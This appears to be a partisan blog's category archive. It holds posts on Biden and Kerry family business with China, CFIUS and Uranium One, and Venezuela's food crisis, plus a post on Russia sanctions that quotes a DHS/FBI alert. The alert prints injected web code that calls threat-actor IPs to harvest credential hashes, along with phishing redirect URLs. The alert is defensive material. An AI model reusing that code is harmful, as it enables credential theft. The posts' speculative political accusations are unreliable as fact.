Keep this post in your bookmarks as we enter into the 2020 general election….
Primer:
1. China plants industrial espionage operatives in the U.S. that steal government contract secrets and sell them back to China. FBI caught at least one.
2. Through cyber espionage, China has stolen much of the F-35 technology, more than 50 terabytes.
3. John Kerry and Joe Biden did exactly the same thing as Hillary…sold access for money while exploiting it all as diplomatic missions with the title(s) of bi-lateral agreements.
4. Subpoena former Treasury Secretary Jack Lew and ask him about the CFIUS approvals of Chinese back enterprises. We may surely need to go back to former Treasury Secretary, Tim Geithner, did he set the table for all this with Obama’s approval creating that ‘Asia Pivot‘?
5. What does Congress know about foreign investments and when do they know it? They get reports, but who is asking questions, anyone?
NYP: Joe Biden and John Kerry have been pillars of the Washington establishment for more than 30 years. Biden is one of the most popular politicians in our nation’s capital.
His demeanor, sense of humor, and even his friendly gaffes have allowed him to form close relationships with both Democrats and Republicans. His public image is built around his “Lunch Bucket Joe” persona. As he reminds the American people on regular occasions, he has little wealth to show for his career, despite having reached the vice presidency.
One of his closest political allies in Washington is former senator and former Secretary of State John Kerry. “Lunch Bucket Joe” he ain’t; Kerry is more patrician than earthy. But the two men became close while serving for several decades together in the US Senate. The two “often talked on matters of foreign policy,” says Jules Witcover in his Biden biography.
So their sons going into business together in June 2009 was not exactly a bolt out of the blue.
But with whom their sons cut lucrative deals while the elder two were steering the ship of state is more of a surprise.
What Hunter Biden, the son of America’s vice president, and Christopher Heinz, the stepson of the chairman of the Senate Committee on Foreign Relations (later to be secretary of state), were creating was an international private equity firm. It was anchored by the Heinz family alternative investment fund, Rosemont Capital. The new firm would be populated by political loyalists and positioned to strike profitable deals overseas with foreign governments and officials with whom the US government was negotiating.
Hunter Biden, Vice President Joe Biden’s youngest son, had gone through a series of jobs since graduating from Yale Law School in 1996, including the hedge-fund business.
By the summer of 2009, the 39-year-old Hunter joined forces with the son of another powerful figure in American politics, Chris Heinz. Senator John Heinz of Pennsylvania had tragically died in a 1991 airplane crash when Chris was 18. Chris, his brothers, and his mother inherited a large chunk of the family’s vast ketchup fortune, including a network of investment funds and a Pennsylvania estate, among other properties. In May 1995, his mother, Teresa, married Senator John Kerry of Massachusetts. That same year, Chris graduated from Yale, and then went on to get his MBA from Harvard Business School.
Joining them in the Rosemont venture was Devon Archer, a longtime Heinz and Kerry friend.
The three friends established a series of related LLCs. The trunk of the tree was Rosemont Capital, the alternative investment fund of the Heinz Family Office. Rosemont Farm is the name of the Heinz family’s 90-acre estate outside Fox Chapel, Pennsylvania.
The small fund grew quickly. According to an email revealed as part of a Securities and Exchange Commission investigation, Rosemont described themselves as “a $2.4 billion private equity firm co-owned by Hunter Biden and Chris Heinz,” with Devon Archer as “Managing Partner.”
The partners attached several branches to the Rosemont Capital trunk, including Rosemont Seneca Partners, LLC, Rosemont Seneca Technology Partners, and Rosemont Realty.
Of the various deals in which these Rosemont entities were involved, one of the largest and most troubling concerns was Rosemont Seneca Partners.
Rather than set up shop in New York City, the financial capital of the world, Rosemont Seneca leased space in Washington, DC. They occupied an all-brick building on Wisconsin Avenue, the main thoroughfare of exclusive Georgetown. Their offices would be less than a mile from John and Teresa Kerry’s 23-room Georgetown mansion, and just two miles from both Joe Biden’s office in the White House and his residence at the Naval Observatory.
Over the next seven years, as both Joe Biden and John Kerry negotiated sensitive and high-stakes deals with foreign governments, Rosemont entities secured a series of exclusive deals often with those same foreign governments.
Some of the deals they secured may remain hidden. These Rosemont entities are, after all, within a private equity firm and as such are not required to report or disclose their financial dealings publicly.
Some of their transactions are nevertheless traceable by investigating world capital markets. A troubling pattern emerges from this research, showing how profitable deals were struck with foreign governments on the heels of crucial diplomatic missions carried out by their powerful fathers. Often those foreign entities gained favorable policy actions from the United States government just as the sons were securing favorable financial deals from those same entities.
Nowhere is that more true than in their commercial dealings with Chinese government-backed enterprises.
Rosemont Seneca joined forces in doing business in China with another politically connected consultancy called the Thornton Group. The Massachusetts-based firm is headed by James Bulger, the nephew of the notorious mob hitman James “Whitey” Bulger. Whitey was the leader of the Winter Hill Gang, part of the South Boston mafia. Under indictment for 19 murders, he disappeared. He was later arrested, tried, and convicted.
James Bulger’s father, Whitey’s younger brother, Billy Bulger, serves on the board of directors of the Thornton Group. He was the longtime leader of the Massachusetts state Senate and, with their long overlap by state and by party, a political ally of Massachusetts Senator John Kerry.
Less than a year after opening Rosemont Seneca’s doors, Hunter Biden and Devon Archer were in China, having secured access at the highest levels. Thornton Group’s account of the meeting on their Chinese-language website was telling: Chinese executives “extended their warm welcome” to the “Thornton Group, with its US partner Rosemont Seneca chairman Hunter Biden (second son of the now Vice President Joe Biden).”
The purpose of the meetings was to “explore the possibility of commercial cooperation and opportunity.” Curiously, details about the meeting do not appear on their English-language website.
Also, according to the Thornton Group, the three Americans met with the largest and most powerful government fund leaders in China — even though Rosemont was both new and small.
The timing of this meeting was also curious. It occurred just hours before Hunter Biden’s father, the vice president, met with Chinese President Hu in Washington as part of the Nuclear Security Summit.
There was a second known meeting with many of the same Chinese financial titans in Taiwan in May 2011. For a small firm like Rosemont Seneca with no track record, it was an impressive level of access to China’s largest financial players. And it was just two weeks after Joe Biden had opened up the US-China strategic dialogue with Chinese officials in Washington.
On one of the first days of December 2013, Hunter Biden was jetting across the Pacific Ocean aboard Air Force Two with his father and daughter Finnegan. The vice president was heading to Asia on an extended official trip. Tensions in the region were on the rise.
The American delegation was visiting Japan, China, and South Korea. But it was the visit to China that had the most potential to generate conflict and controversy. The Obama administration had instituted the “Asia Pivot” in its international strategy, shifting attention away from Europe and toward Asia, where China was flexing its muscles.
For Hunter Biden, the trip coincided with a major deal that Rosemont Seneca was striking with the state-owned Bank of China. From his perspective, the timing couldn’t have been better.
Vice President Biden, Hunter Biden and Finnegan arrived to a red carpet and a delegation of Chinese officials. Greeted by Chinese children carrying flowers, the delegation was then whisked to a meeting with Vice President Li Yuanchao and talks with President Xi Jinping.
Hunter and Finnegan Biden joined the vice president for tea with US Ambassador Gary Locke at the Liu Xian Guan Teahouse in the Dongcheng District in Beijing. Where Hunter Biden spent the rest of his time on the trip remains largely a mystery. There are actually more reports of his daughter Finnegan’s activities than his.
What was not reported was the deal that Hunter was securing. Rosemont Seneca Partners had been negotiating an exclusive deal with Chinese officials, which they signed approximately 10 days after Hunter visited China with his father. The most powerful financial institution in China, the government’s Bank of China, was setting up a joint venture with Rosemont Seneca.
The Bank of China is an enormously powerful financial institution. But the Bank of China is very different from the Bank of America. The Bank of China is government-owned, which means that its role as a bank blurs into its role as a tool of the government. The Bank of China provides capital for “China’s economic statecraft,” as scholar James Reilly puts it. Bank loans and deals often occur within the context of a government goal.
Rosemont Seneca and the Bank of China created a $1 billion investment fund called Bohai Harvest RST (BHR), a name that reflected who was involved. Bohai (or Bo Hai), the innermost gulf of the Yellow Sea, was a reference to the Chinese stake in the company. The “RS” referred to Rosemont Seneca. The “T” was Thornton.
The fund enjoyed an unusual and special status in China. BHR touted its “unique Sino-US shareholding structure” and “the global resources and network” that allowed it to secure investment “opportunities.” Funds were backed by the Chinese government.
In short, the Chinese government was literally funding a business that it co-owned along with the sons of two of America’s most powerful decision makers.
The partnership between American princelings and the Chinese government was just a beginning. The actual investment deals that this partnership made were even more problematic. Many of them would have serious national security implications for the United States.
In 2015, BHR joined forces with the automotive subsidiary of the Chinese state-owned military aviation contractor Aviation Industry Corporation of China (AVIC) to buy American “dual-use” parts manufacturer Henniges.
AVIC is a major military contractor in China. It operates “under the direct control of the State Council” and produces a wide array of fighter and bomber aircraft, transports, and drones — primarily designed to compete with the United States.
The company also has a long history of stealing Western technology and applying it to military systems. The year before BHR joined with AVIC, the Wall Street Journal reported that the aviation company had stolen technologies related to the US F-35 stealth fighter and incorporated them in their own stealth fighter, the J-31. AVIC has also been accused of stealing US drone systems and using them to produce their own.
In September 2015, when AVIC bought 51 percent of American precision-parts manufacturer Henniges, the other 49 percent was purchased by the Biden-and-Kerry-linked BHR.
Henniges is recognized as a world leader in anti-vibration technologies in the automotive industry and for its precise, state-of-the-art manufacturing capabilities. Anti-vibration technologies are considered “dual-use” because they can have a military application, according to both the State Department and Department of Commerce.
The technology is also on the restricted Commerce Control List used by the federal government to limit the exports of certain technologies. For that reason, the Henniges deal would require the approval of the Committee on Foreign Investment in the United States (CFIUS), which reviews sensitive business transactions that may have a national security implication.
According to BHR internal documents, the Henniges deal included “arduous and often-times challenging negotiations.” The CFIUS review in 2015 included representatives from numerous government agencies including John Kerry’s State Department.
The deal was approved in 2015.
Excerpted with permission from “Secret Empires: How the American Political Class Hides Corruption and Enriches Family and Friends,” by Peter Schweizer, published by Harper Collins. The book goes on sale March 20.
Category Archives: Treasury
CERT/FBI Declaration of Russia Hacking U.S. Infrastructure
US sanctions Russia for election interference, cyberattacks
The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”
CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”
The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.
The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.
“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”
The sanctions come after an investigation by the Department of Homeland Security and the FBI.
The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.
The Russian embassy didn’t respond to a request for comment.
‘A long-overdue step’
On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.
“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.
Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.
“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”
Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.
The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”
Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.
The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.
Systems Affected
- Domain Controllers
- File Servers
- Email Servers
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.
DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).
For a downloadable copy of IOC packages and associated files, see:
- TA18-074A_TLP_WHITE.csv
- TA18-074A_TLP_WHITE.stix.xml
- MIFR-10127623_TLP_WHITE.pdf
- MIFR-10127623_TLP_WHITE_stix.xml
- MIFR-10128327_TLP_WHITE.pdf
- MIFR-10128327_TLP_WHITE_stix.xml
- MIFR-10128336_TLP_WHITE.pdf
- MIFR-10128336_TLP_WHITE_stix.xml
- MIFR-10128830_TLP_WHITE.pdf
- MIFR-10128830_TLP_WHITE_stix.xml
- MIFR-10128883_TLP_WHITE.pdf
- MIFR-10128883_TLP_WHITE_stix.xml
- MIFR-10135300_TLP_WHITE.pdf
- MIFR-10135300_TLP_WHITE_stix.xml
Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
Description
Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)
This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”
Technical Details
The threat actors in this campaign employed a variety of TTPs, including
- spear-phishing emails (from compromised legitimate account),
- watering-hole domains,
- credential gathering,
- open-source and network reconnaissance,
- host-based exploitation, and
- targeting industrial control system (ICS) infrastructure.
Using Cyber Kill Chain for Analysis
DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.
Stage 1: Reconnaissance
The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.
Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.
Stage 2: Weaponization
Spear-Phishing Email TTPs
Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
Use of Watering Hole Domains
One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.
<img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;” /> |
In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:
var i = document.createElement(“img”);
i.src = “file[:]//184.154.150[.]66/ame_icon.png”; i.width = 3; i.height=2; |
Stage 3: Delivery
When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)
In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.
Stage 4: Exploitation
The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.
When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)
Stage 5: Installation
The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.
Establishing Local Accounts
The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.
Pritzker, Boxer, Sherman and MoveOn.org, the Strike Force
The top person on John Kerry’s Iran JPOA team was Wendy Sherman. But then we have Obama’s dear friend Penny Pritzker in the mix too, along with Barbara Boxer and Hillary’s Jake Sherman all part of this National Security Action team, which is all things against Trump. So, while we do have the Director of MoveOn in the mix…this group likely has some robust funding from Soros.
This is a strike force that even includes Jeremy Bash.
He served as Chief of Staff of the CIA (2009-2011) and Defense Department (2011-2013), was Panetta’s right hand person and perhaps we should remember it was Panetta that allowed Hollywood access to top secret information to make a movie, that Zero Dark Thirty movie.
According to a June 15, 2011, email from Benjamin Rhodes, Deputy National Security Advisor for Strategic Communications, the Obama White House was intent on “trying to have visibility into the UBL (Usama bin Laden) projects and this is likely a high profile one.”
Ben Rhodes the aspiring novelist became Obama’s top advisor even when Rhodes security clearance was denied.
In early July 2012, Obama’s senior White House adviser on Iran, Puneet Talwar, and Secretary of State Hillary Clinton’s right-hand man, Jake Sullivan, arrived in the sleepy Arabian sultanate of Oman, 150 miles across sparkling Gulf waters from the Iranian coast. It was the first significant back-channel contact with Tehran.
FNC: A group of about 50 former Obama administration officials recently formed a think tank called National Security Action to attack the Trump administration’s national security policies.
The mission statement of the group is anything but subtle: “National Security Action is dedicated to advancing American global leadership and opposing the reckless policies of the Trump administration that endanger our national security and undermine U.S. strength in the world.”
National Security Action plans to pursue typical liberal foreign policy themes such as climate change, challenging President Trump’s leadership, immigration and allegations of corruption between the president and foreign powers.
This organization uses the acronym NSA, which is ironic. Three of its founding members – Ben Rhodes, Susan Rice and Samantha Power – likely were involved in abusing intelligence from the federal NSA (National Security Agency) to unmask the names of Trump campaign staff from intelligence reports and to leak NSA intercepts to the media to hurt Donald Trump politically. This included a leak to the media of an NSA transcript in February 2017 of former National Security Adviser Michael Flynn’s discussion with Russian Ambassador to the U.S. Sergei Kislyak. No one has been prosecuted for this leak.
Given the likely involvement of Rhodes, Rice and Power to weaponize intelligence against the Trump presidential campaign, will their anti-Trump NSA issue an apology for these abuses?
It is interesting that the new anti-Trump group says nothing in its mandate about protecting the privacy of Americans from illegal surveillance, preventing the politicization of U.S. intelligence agencies or promoting aggressive intelligence oversight. Maybe this is because the founders plan to abuse U.S. intelligence agencies to spy on Republican lawmakers and candidates if they join a future Democratic administration.
It takes a lot of chutzpah for this group of former Obama officials, who were part of the worst U.S. foreign policy in history, to condemn the current president’s successful international leadership and foreign policy.
After all, ISIS was born on President Obama’s watch because of his mismanagement of the U.S. withdrawal from Iraq and his “leading from behind” Middle East policy. The Syrian civil war spun out of control because of the incompetence of President Obama and his national security team.
This was a team that provided false information to the American people about the 2012 terrorist attack on the U.S. consulate in Benghazi and the nuclear deal with Iran. I wonder if the anti-Trump NSA will include videos on its website of former National Security Adviser Susan Rice falsely claiming on five Sunday morning news shows in September 2012 that the attack on the Benghazi consulate was “spontaneous” and in response to an anti-Muslim video.
And of course there’s the North Korean nuclear and missile programs that surged during the Obama years due to the administration’s “Strategic Patience” policy, an approach designed to kick this problem down the road to the next president. Because of President Obama’s incompetence, North Korean dictator Kim Jong Un may have an H-bomb that he soon will be able to load onto an intercontinental ballistic missile to attack the United States.
It must appall this group of former Obama national security officials that President Trump is succeeding as he undoes everything they worked on.
ISIS will soon control no territory in Iraq or Syria because of the Trump administration’s intensified attacks on it and arming of Kurdish militias.
In sharp contrast to President Obama, President Trump drew a chemical weapons red line in Syria and enforced it.
North Korea is pushing for talks with the U.S. in response to strong United Nations sanctions the U.S. worked to obtain in 2017. And compliance with the new sanctions has been significantly improved, especially by China, as the result of President Trump’s actions.
President Trump repaired the damage done to U.S.-Israel relations by President Obama and has recognized Jerusalem as the capital of Israel – something several previous presidents promised but failed to do.
Iranian harassment of U.S. ships in the Persian Gulf stopped in 2017, likely due to the more assertive Iran policy of President Trump. This includes the president’s successful effort to build a stronger U.S. relationship with Saudi Arabia.
President Trump is right when he says he inherited a mess on national security from the Obama administration. This is because President Obama and his national security team undermined U.S. credibility and left President Trump a much more dangerous world. I doubt the new anti-Trump National Security Action think tank will succeed in convincing Americans otherwise.
CFIUS, what is Worse than Uranium One?
When Douglas Campbell, the FBI informant and Uranium One whistle-blower says that Obama himself approved the deal, he was right. Campbell has delivered in February, written testimony annexed with full evidence to three congressional committees. Further, he was provided an monetary award/reward for his remarkable work as an informant. For the full summary and details, go here.
Campbell’s lawyer of record, Victoria Toensing has sent a letter to Attorney General Jeff Sessions to further investigate the matter and the media smearing of Campbell himself including committee leaks. That letter is found here.
AG Sessions has not responded at the time of this post.
Related reading: Cfius, Powerful and Unseen, Is a Gatekeeper on Major Deals
Meanwhile, looking deeper into Obama and CFIUS….
By law, CFIUS, Committee on Foreign Investment in the United States, does not publicly disclose information provided to CFIUS by parties to a transaction, nor does it reveal the fact that the parties have submitted the transaction for review. If CFIUS determines that the transaction poses national security concerns that cannot be resolved, it will refer the transaction to the President which the President has 15 days after completion of CFIUS’s investigation to decide. The President must publicly announce his decision.
CFIUS provides an annual report to Congress, but the last report was dated 2015. This report is in accordance with section 721(m) of the Defense Production Act of 1950 and the amended section of the Foreign Investment and National Security Act of 2007.
The Process
During the review period, CFIUS members examine the transaction in order to identify and address, as appropriate, any national security concerns that arise as a result of the transaction. CFIUS concludes action on the preponderant majority of transactions during or at the end of the initial 30-day review period. In certain circumstances defined in section 721 and at § 800.503 of the regulations, CFIUS may initiate a subsequent investigation, which must be completed within 45 days. In certain circumstances described at section 6(c) of Executive Order 11858, as amended, and § 800.506 of the regulations, CFIUS may also refer a transaction to the President for decision. In such case, section 721 requires the President to announce a decision with respect to a transaction within 15 days of CFIUS’s completion of the investigation. If CFIUS finds that a covered transaction presents national security risks and that other provisions of law do not provide adequate authority to address the risks, then CFIUS may enter into an agreement with, or impose conditions on, parties to mitigate such risks or may refer the case to the President for action.
Where CFIUS has completed all action with respect to a covered transaction or the President has announced a decision not to exercise his authority under section 721 with respect to the covered transaction, then the parties receive a “safe harbor” with respect to that transaction, as described in § 800.601 of the regulations and section 7(f) of Executive Order 11858, as amended.
Rejection
During the entire term of President, he only got one referral that he rejected. President Obama blocked a privately owned Chinese company from building wind turbines close to a Navy military site in Oregon due to national security concerns, and the company said it would challenge the action in court.
Ralls Corp, which had been installing wind turbine generators made in China by Sany Group, has four wind farm projects that are within or in the vicinity of restricted air space at a naval weapons systems training facility, according to the Obama administration.
“There is credible evidence that leads me to believe” that Ralls Corp, Sany Group and the two Sany Group executives who own Ralls “might take action that threatens to impair the national security of the United States,” Obama said in issuing his decision.
Industry Sectors
From 2009-2015, 75% of the foreign transactions included finance, information, mining, utilities and transportation. From 2013-2015, China was the largest country with transactions by far with manufacturing being the majority of the transactions. If there are concerns with any part of the transaction, CFIUS will work on mitigation measures as they relate to national security such that CFIUS earnestly wants the transaction(s) to occur. CFIUS offers onsite compliance, assigns additional staff and offers tracking systems as well as instructions and procedures from in-house expertise to meet stipulations and standards where on other issues, waivers can be designated if compliance is too difficult or adverse to national security standards and law.
Review Concerns
Expanded conditions for national security considerations include vulnerabilities, cyber, sabotage and exploitation. Further, if any transaction leads to complications to critical infrastructure or energy production or would affect the U.S. financial system and would in some conditions have access to sensitive government information, classified material or in any manner threaten a government employee, involve activities related to weapons, munitions, aerospace, satellite or radar system(s), these items would impair the approval process or under the CFIUS review, mitigation procedures would be applied.
Little is of consequence when a foreign company that under cover is actually controlled by a foreign government which is a terrifying condition. A 2011 Office of the National Counterintelligence Executive report to Congress stated that the pace of foreign economic collection and industrial espionage activities against major U.S corporations and U.S. government agencies is accelerating.
Are we sure we want China, Russia or any Middle Eastern country investing in any form or part in the United States when we have the likes of Warren Buffet or Bill Gates and those billions?
Sens. Tom Cotton (R-Ark.) and Marco Rubio (R-Fla.) introduced legislation on Wednesday to prevent the U.S. government from using products from certain Chinese telecommunications firms.
The impetus for Cotton and Rubio’s legislation is concern over the Chinese government using hypothetical backdoors in ZTE and Huawei phones to spy on U.S. government officials.
“Huawei is effectively an arm of the Chinese government, and it’s more than capable of stealing information from U.S. officials by hacking its devices,” Cotton said in a statement. “There are plenty of other companies that can meet our technology needs, and we shouldn’t make it any easier for China to spy on us.”
Uranium One violated all conditions set forth in the CFIUS law. China is yet a larger security issue and all agency members of CFIUS are aware of this and the history of both Russia and China.
The risks and violations of law are well known in Congress and legislation has been introduced to address major concerns, yet still the United States is and has sold out to at least 2 rogue countries and no security assessments have been published.
UN Declares Sadness and Desperation in Venezuela is About Food
Except for the U.S. ambassador to the United Nations, Nikki Haley that is.
Amid growing food insecurity and rising malnutrition among children on the back of a protracted economic crisis in Venezuela, the United Nations Children’s Fund (UNICEF) on Friday called on all actors for rapid and coordinated assistance efforts to reach those most in need.
“While precise figures are unavailable because of very limited official health or nutrition data, there are clear signs that the crisis is limiting children’s access to quality health services, medicines and food,” said the UN agency in a news release, Friday, underlining the severity of the situation.
According to UNICEF, national reports in 2009 (the most recent official figures) showed that the prevalence of wasting (low weight to height ratio) in children under five was, at the time, 3.2 per cent.
However, more recent non-official studies indicate “significantly higher rates” of as much as 15.5 per cent, and an additional 20 per cent of children at risk of malnutrition.
Similarly, the State of Food Security and Nutrition in the World 2017 (a comprehensive report on the subject prepared by a number of UN agencies) suggested that undernourishment – a measure of hunger indicating the proportion of population with inadequate energy consumption – in Venezuela rose from 10.5 per cent in 2004-2006 to 13 per cent in 2014-2016.
In response, the Venezuelan Government has implemented measures to mitigate the impact of the crisis on the country’s children, including providing regular food packages at affordable prices to the most vulnerable families, cash transfers, and strengthening of nutritional and recuperation services.
“But more needs to be done to reverse the worrisome decline in children’s nutritional wellbeing,” said UNICEF, calling for the rapid implementation of a short-term response to counter malnutrition, based on disaggregated data and coordinated between the Government and partners.
On its part, the UN agency is working with the Ministry of Health, National Institute of Nutrition and the civil society to strengthen and expand nutritional surveillance at the community level and provide nutritional recuperation services through partners organizations.
The efforts are being implemented through activities such as nutrition screening days aiming to reach over 113,000 children, provision of supplementary and therapeutic foods when required, training programmes and communication campaigns, added UNICEF.
Venezuela has been mired in a socio-economic and political crisis since 2012 and has witnessed rising consumer prices even as the overall economy has contracted.
***
Some 3 million Venezuelans—a tenth of the population—have left Venezuela since late leader Hugo Chavez started his socialist revolution in 1999. More than 500,000 have fled to Colombia—many illegally—hoping to escape grinding poverty, rising violence and shortages of food and medicine in the once-prosperous nation.
Photographer Jaime Saldarriaga joined Reuters journalists at the Paraguachón border crossing to document the exodus from Venezuela, which is now on a scale echoing the departure of Myanmar’s Rohingya people to Bangladesh.
Hundreds of migrants lugging heavy suitcases and overstuffed backpacks walk along the road to the Colombian border town of Maicao, beneath the blazing sun. The Venezuelans arrive hungry, thirsty and tired, often unsure where they will spend the night—but they are relieved to have escaped the calamitous situation in their homeland.
The broken line snakes back eight miles (13 km) to the border crossing, where more than a hundred Venezuelans wait in the heat outside the migration office.
Money-changers sit at tables stacked with wads of bolívares—Venezuela’s currency—made nearly worthless by hyperinflation under President Nicolas Maduro’s socialist government.
“It’s migrate and give it a try or die of hunger there. Those are the only two options,” Yeraldine Murillo, 27, who left her six-year-old son behind in the Venezuelan city of Maracaibo, told Reuters. “There, people eat from the trash. Here, people are happy just to eat,” she said, adding she hopes to find work in Colombia’s capital, Bogotá, and send for her son.
Migrants told Reuters they were paying up to 400,000 bolívares for a kilo of rice in Venezuela. The official monthly minimum wage is 248,510 bolívares—around $8 at the official exchange rate, or $1.09 on the black market.
Food shortages, which many migrants jokingly refer to as the “Maduro diet,” have left people noticeably thinner than in photos taken years earlier for their identification cards.
